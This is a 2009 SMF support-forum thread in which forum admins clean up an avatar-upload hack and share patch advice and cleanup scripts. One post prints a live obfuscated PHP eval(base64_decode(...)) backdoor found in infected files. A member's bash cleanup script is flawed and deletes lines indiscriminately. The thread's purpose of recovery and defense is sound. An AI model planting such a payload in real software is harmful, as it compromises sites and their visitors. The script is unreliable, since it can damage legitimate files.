Vinny
Title: Re: Hacked, script injection
Post by: mghq on May 21, 2009, 05:24:39 PM
Hi,

My forum has been hacked today by krisbarto he came online for about 1 minute and uploaded a image very small dot, but i only found this an hour later. I searched the name and found this thread. I have banned him, removed the image from database and attachments folder and i am currently going though all php files, so far i have not found a line at the top but i have found this in the gallery php file :

die(base64_decode('UG93ZXJlZCBieSBHYWxsZXJ5IEZvciBTTUYgIG1hZGUgYnkgdmJnYW1lcjQ1IGh0dHA6Ly93d3cuc21maGFja3MuY29t'));

Is that meant to be there ? I don't really know what i'm doing this is all new to me.

Thank you for any help

That one is safe I place that for copyright reasons says
Powered by Gallery For SMF  made by vbgamer45 http://www.smfhacks.com

I was going to say that too
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 21, 2009, 07:45:02 PM
updated mine, thanks guys!
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 12:43:30 AM
My god...  I should have come here sooner.

I have been battling this for weeks and have started from scratch twice... 

The only thing I have saved was the avatars...  darn it, I was reinfecting myself and did not even know it.

I have to be honest, this is a nasty one.  I first noticed it a few weeks ago when I logged in from my blackberry and got nothing but spam...  I quickly found a computer and logged in to shut my forum down but saw it was doing nothing to the regular page so I figured it was just in the mobile version...  then my forum kept crashing because my error log was overflowing the database.

One quick question.  Does the 1.1.9 patch fix the problem or just prevent it from reoccuring once you fix it?
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:04:21 AM
Wow...  I am going through all of my php files and this little bugger is in every single one of them.

This is going to be a loooooooong night.
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:18:59 AM
Interestingly enough, there have been two files without this string so far...

notify.php and reminder.php
Title: Re: Hacked, script injection
Post by: Eleseon on May 22, 2009, 01:21:58 AM
What a lovely way to keep me awake tonight. First I get Anon-attacked, and then this.

I deleted all of the funky php from the forum itself...but the rest of my site? *cries* It's going to take me forever.

I'm really glad this thread was here though, to walk me through all of this. Thank you all, I really appreciated all of this. ^_^
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:35:37 AM
So let me get this right... unless I get it from every php file it will just come back to the rest again?
Title: Re: Hacked, script injection
Post by: ldk on May 22, 2009, 01:40:47 AM
So let me get this right... unless I get it from every php file it will just come back to the rest again?

Nope. You need to do all of these three things:

1. delete any avatars with the malicious code in them

2. delete theme_dir entries in your DBPREFIX_themes table that are set like so:
./attachments/avatar_xxxxx.gif\0

3. upgrade to 1.1.9

and then all the crap you take out of your php files won't come back.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 22, 2009, 01:41:13 AM
Probable though, that infected files on the server may alone do damage..
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:42:12 AM
So let me get this right... unless I get it from every php file it will just come back to the rest again?

Nope. You need to do all of these three things:

1. delete any avatars with the malicious code in them

2. delete theme_dir entries in your DBPREFIX_themes table that are set like so:
./attachments/avatar_xxxxx.gif\0

3. upgrade to 1.1.9

and then all the crap you take out of your php files won't come back.

on it!

1. done
2. working on it
3. done
Title: Re: Hacked, script injection
Post by: JBlaze on May 22, 2009, 01:45:40 AM
Also, there are other files named like style.css.php and s.php (not normal SMF files) scattered throughout.

Make sure to delete those as well as any files named with random sequences of numbers and letter.
Title: Re: Hacked, script injection
Post by: massillon on May 22, 2009, 01:51:39 AM
Did not find anything like that in my DB.

Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 09:09:00 AM
So let me get this right... unless I get it from every php file it will just come back to the rest again?

Nope. You need to do all of these three things:

1. delete any avatars with the malicious code in them

2. delete theme_dir entries in your DBPREFIX_themes table that are set like so:
./attachments/avatar_xxxxx.gif\0

3. upgrade to 1.1.9

and then all the crap you take out of your php files won't come back.

1. I dleted all avatars
2. Can I get help with these, more specific
3. Done
4. THX!
Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 09:26:17 AM
Just to mention, I realized now, that yesterday, afte I deleted kris and removed all avatars and upgrade to 1.1.9. it worked, but today it doesn't, and nothing I upload shows on my server in attachment dir. So obviously I didn't clean everything. Please help
Title: Re: Hacked, script injection
Post by: ConquerorOfMankind on May 22, 2009, 10:31:51 AM
Quote
and nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?
Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 12:36:33 PM
Quote
and nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?

Yes....It worked yesterday.
Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 01:13:45 PM
I just wanted to delete SMF gallery an unnistal failed in:
4.     Execute Modification     ./Sources/ManagePermissions.php     Test failed
5.    Execute Modification    ./Themes/default/index.template.php    Test failed

So I checked those 2 files, and saw this:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy92aG9zdHMvemJvcmlzdGUuY29tL2h0dHBkb2NzL2ZvcnVtL1RoZW1lcy9jbGFzc2ljL2ltYWdlcy9iYmMvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy92YXIvd3d3L3Zob3N0cy96Ym9yaXN0ZS5jb20vaHR0cGRvY3MvZm9ydW0vVGhlbWVzL2NsYXNzaWMvaW1hZ2VzL2JiYy9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

But even when I delete that I can't uninstall gallery without tes failed.
Title: Re: Hacked, script injection
Post by: Kindred on May 22, 2009, 01:28:17 PM
the failure of a mod to install has no bearing on the hack...     the test failed suggests that something has changed the code that the mod is looking for so that it can not automatically install. You will have to manually install the mod into those files.

Title: Re: Hacked, script injection
Post by: romper on May 22, 2009, 01:41:38 PM
the failure of a mod to install has no bearing on the hack...     the test failed suggests that something has changed the code that the mod is looking for so that it can not automatically install. You will have to manually install the mod into those files.

I'm trying to unistall....Problem is I see code (already mention here...eval base64...and so on) on more files, and I have a lot of mods installed. I was hoping that 1.1.9 will fix that, but now I'm not sure what to do?
Start deleting those lines manualy? Leave everything? Restore base? Delete everything and start over? (hope not)
Title: Re: Hacked, script injection
Post by: Kindred on May 22, 2009, 02:12:02 PM
If you have a backup from before the attack, then use that... (if you don't, then I suggest that you start keeping one)

Otherwise, take the full install package of SMF 1.1.9, save the Settings.php file on your local computer and delete all PHP files from your forum directories.   The reload the forum files using the install package... delete the install files and copy your saved version of Settings.php (after making sure that it is clean)

You now have your forum reset to a clean state and you can re-apply mods as needed.
Title: Re: Hacked, script injection
Post by: ellion on May 22, 2009, 05:03:43 PM
i just went through my DB to check for theme_dir entries and i found the follwoing entries.
Code: [Select]
 
249  32  theme_dir  ./attachments/avatar_249.gif\0
280 32 theme_dir ./attachments/avatar_280.jpg�
488 32 theme_dir ./attachments/avatar_488.jpg�
the first column of numbers are the member id the id 488 is kris barteo.

should i delete ethese entries?
Title: Re: Hacked, script injection
Post by: Sarge on May 22, 2009, 05:14:48 PM
What are the names for the other IDs?
Title: Re: Hacked, script injection
Post by: WHK on May 22, 2009, 07:21:44 PM
More bugs for smf 1.1.9
http://foro.elhacker.net/nivel_web/bug_en_smf_118_y_119-t255613.0.html

Att, WHK.
Title: Re: Hacked, script injection
Post by: JBlaze on May 22, 2009, 07:32:15 PM
More bugs for smf 1.1.9
http://foro.elhacker.net/nivel_web/bug_en_smf_118_y_119-t255613.0.html

Att, WHK.

Heh, my topic is linked :P
Title: Re: Hacked, script injection
Post by: Kindred on May 22, 2009, 07:47:50 PM
ok... rather than post a link to a spanish forum with a relatively useless comment, care to tell use what they claim the bug in 1.1.9 is?
Title: Re: Hacked, script injection
Post by: FinsandFur on May 24, 2009, 02:53:58 AM
I've got another forum that he hit.
I scanned through most of what you folks got here, but couldn't bring myself to read all 17 pages :-\

Basically, I'm just bringing ya's some more info to the table.

The said forum was for a client I just took over the maintenance duties last week.
They were on 1.1.7 at the time of the hack, which was Jan18th, 09
The path he chose was relatively easy to follow looking at last modified dates through SSH.

He also added a php file to the Packages directory titled "tvax.php" that was heavily infected. I DO have that file zipped if anyone wants to analyze it.

Title: Re: Hacked, script injection
Post by: Daniel15 on May 24, 2009, 05:28:40 AM
I'm a victim too, and took another route in preventing future attacks. First, I didn't have backups so I downloaded and cleaned the files using this Linux bash script with base64_encode as the search term. The script deletes that line entirely, leaving no white space:
Code: [Select]
#!/bin/bash
find /directory_name '*.php' -type f | while read FILE
do
sed -i '/base64_decode/ d' "$FILE"
done
This cleaned everything recursively, but I did have to replace one file that had a legit line with the search term in it (can't remember which one, but you'll know from the error it generates). Then I uploaded the clean files and was back in business. Took about an hour to do all this.

Thanks for the script, saved me a whole heap of time cleaning an infected forum. :)
Now to clean the random junk it left behind >_<
Title: Re: Hacked, script injection
Post by: agridoc on May 24, 2009, 05:52:36 AM
Altough I did some work with SHH commands, I finally cleaned my files by creating a zip file with SHH, containing all PHP files in my domain
Code: [Select]
zip -R filename '*.php'Then cleaned them with Search & Replace Master (http://www.knowlesys.com/software/search-and-replace-master/), an excellent freeware tool, I really liked it, then FTP in my site.

It's useful to have a file with the injected code. See here how to use it for finding the directory with style.css.php and s.php
http://www.simplemachines.org/community/index.php?topic=307717.msg2060807#msg2060807
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 24, 2009, 02:09:52 PM
I've made a php script that will clean all infected files on your server (attached)
Just put it in the root directory and it will search and remove junk line from all php's recursively.

Btw, is there other problems caused by this hack ? Like does it install some backdoors that need to be removed as well ?
Title: Re: Hacked, script injection
Post by: Dzonny on May 25, 2009, 02:57:02 PM
Really, that is very good work Ratiomaster...
Anyone fixed forum with this tool ??
Title: Re: Hacked, script injection
Post by: romper on May 25, 2009, 04:48:29 PM
I've made a php script that will clean all infected files on your server (attached)
Just put it in the root directory and it will search and remove junk line from all php's recursively.

Btw, is there other problems caused by this hack ? Like does it install some backdoors that need to be removed as well ?

Greattt! I'm clean now, but this will be on my reserves!!!
Title: Re: Hacked, script injection
Post by: aly22 on May 25, 2009, 06:50:28 PM
if I already deleted user kristabero how do I know if the avatar has been left behind please?
Title: Re: Hacked, script injection
Post by: aly22 on May 25, 2009, 10:44:34 PM
Anyone tried the cleanup script? I don't want to be skeptical, and it scans clean ... but with all I've cleaned up manually over the past week, I am timid of installing/running anything without some assurance it works. Thx
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 10:27:02 AM
I used it on my own server :)
Because this hack infects not only php in the forum directory , but also all php files in other directories up to root, it was not realistic for me to try and clean it by hand.
I've attached cleanup_test.php. This file will only scan all php's and report infected files with "INFECTED" line without actually removing anything. So you can see if you are clean or not.
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 10:46:07 AM
Also, i just noticed, simple machines released official clean up tool in this thread :
http://www.simplemachines.org/community/index.php?topic=313201.0

Keep in mind that it only cleans files in your forum directory. If you want to clean all server, then you need to copy :
settings.php. SBI.php and kb_scan.php to your root folder.
And then type in the browser www.yoursite.com/kb_scan.php and wait a few minutes :)

I was clean also according to official tool, so i feel much safer now :)

Good luck.
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 11:07:39 AM
Thats actually an oversight. The whole site is compromised due to attack, not only forum. I hope they fix it soon.
You can still avoid that check, but running script in the same window (same session) after you logged into your forum, and then manually changing url.

Title: Re: Hacked, script injection
Post by: Dzonny on May 26, 2009, 11:12:21 AM
Thanks for info, this is great tool, i'm glad this is released too.. :D
Title: Re: Hacked, script injection
Post by: aly22 on May 26, 2009, 11:20:47 AM
ran cleanup_test.php and it just lists a ton of files. I see no "infected" tag on them so does that mean I'm clean or did something wrong?
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 11:55:19 AM
What's cool about Ratiomaster's script is that it can catch any "base64_decode" injection in all directories - am I correct?

You can drop it in any directory and it will search it and all subdirectories.

Official tool is more user friendly and comprehensive, it looks in 'php', 'phtml', 'php3' for pattern. But it requires that you drop this tool in your forum folder.
Also trying to look something in database - not found anything on my site and it slightly suspicious, because i didnt touched database and if exploit does change database, then it means the backdoor is still there...
I dont suggest to run official tool on the whole site (on the forum only its probably OK), because it can corrupt one of your valid files .
I'd wait until official team fix those issues first.
Title: Re: Hacked, script injection
Post by: Ratiomaster on May 26, 2009, 11:59:26 AM
ran cleanup_test.php and it just lists a ton of files. I see no "infected" tag on them so does that mean I'm clean or did something wrong?

If you didnt manually cleaned up infections , then it definitely means you're not infected. If you cleaned them up before running either tool, it just confirms that you dont have most obvious traces of it. But considering sophistication of the exploit, i'm afraid that it installed some backdoors which neither of tools really cleans.
Title: Re: Hacked, script injection
Post by: glennk on May 26, 2009, 03:17:16 PM
Hi There,

Theres quite a lot oftopics on this and a lot of posts here. I dont really know where to start. I have (Did have) a forum member called Krisbarteo. I have now banned him. I have been experiencing problems for a few weeks. My forum members tell me that their antivirus is warning of problems in the site. Namely

exploit javascript obfuscation type(501)

j.s.cruzer-c (trj) trojan horse

It appears to have effected a lot of things even the spellchecker.

It apparently is also present in my coippermine gallery and my wordpress sites which are all on the same domain in subfolders.

Can someone advise on what to do. Do I overwrite everyfile or is their a simpler solution here ??

Many thanks for your time - Glenn
Title: Re: Hacked, script injection
Post by: Antechinus on May 26, 2009, 09:17:28 PM
Grab the cleanup script and run it. http://www.simplemachines.org/community/index.php?topic=313201.0
This one has been looked at by the SMF team. As far as I know Ratiomaster's script has not, so at the moment I'm not in a position to recommend it. However if other members are getting good results with it this is a good sign, and we may be able to incorporate the best features of both scripts in one tool. 
Title: Re: Hacked, script injection
Post by: Fustrate on May 27, 2009, 12:05:17 AM
FYI, you can change the path to SSI.php at the top of the file in order to use it from a lower directory.

Both Ratiomaster's and my scripts do the same thing for the infected files, but kb_scan.php also scans the database and looks for files such as those that could be added by the exploit. By what I see in cleanup.php, it's safe and should do the just as well for any infected files :)
Title: Re: Hacked, script injection
Post by: Anhinga on May 27, 2009, 12:05:54 AM
I’m a member of a forum running SMF 1.1.4 where users can upload there own avatars, and krisbarteo is registered there, although as far as I can tell he hasn’t attacked it yet.  I hope I can get the administrator to delete this guy’s account and update the forum.

The forum is http://tyrantkingforums.net/ .  I don’t see any spam links in the forum’s source code; is there anything else I should look for to determine whether he’s used this exploit there?
Title: Re: Hacked, script injection
Post by: Fustrate on May 27, 2009, 12:06:49 AM
You should point them towards http://www.simplemachines.org/community/index.php?topic=313201.0 so that they can check everything themself :)
Title: Re: Hacked, script injection
Post by: kassie on June 01, 2009, 05:06:24 AM
All the php files on my site have been injected with Base64-encoded text that translates to
Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.

Hi had this member on my forum & so I deleted them & all the code that was at the top of site when in profile to change themes is now gone. I left my computer for an hour & now I can't see my site any more. I get this message.

"Not Found

The requested URL /smf/index.php was not found on this server."

I've gone into Cpanel & all the files are there. I don't have a backup either. What can I do?
Title: Re: Hacked, script injection
Post by: JBlaze on June 01, 2009, 05:08:05 AM
Have you tried using the exploit utility released especially for this hack?

http://www.simplemachines.org/community/index.php?topic=313201.0
Title: Re: Hacked, script injection
Post by: kassie on June 01, 2009, 05:26:26 AM
No I haven't, thanks.
Oh can I use that with 1.1.9? I had updated before knowing about this.
Title: Re: Hacked, script injection
Post by: JBlaze on June 01, 2009, 05:30:06 AM
Yes, you can use it on any version from the 1.0.x series, 1.1.x series as well as 2.0
Title: Re: Hacked, script injection
Post by: kassie on June 01, 2009, 05:30:51 AM
Thank you JBlaze :)
Title: Re: Hacked, script injection
Post by: H on June 01, 2009, 07:57:30 AM
The hack that caused the issue prompting this topic has been fixed in SMF 1.1.9 or 2.0 RC1-1

Release announcement: http://www.simplemachines.org/community/index.php?topic=311899.0
Confirm that your site has not been exploited with our scanning tool: http://www.simplemachines.org/community/index.php?topic=313201.0

If you have any further questions or concerns please start a new topic so that we can track individual issues.

Thanks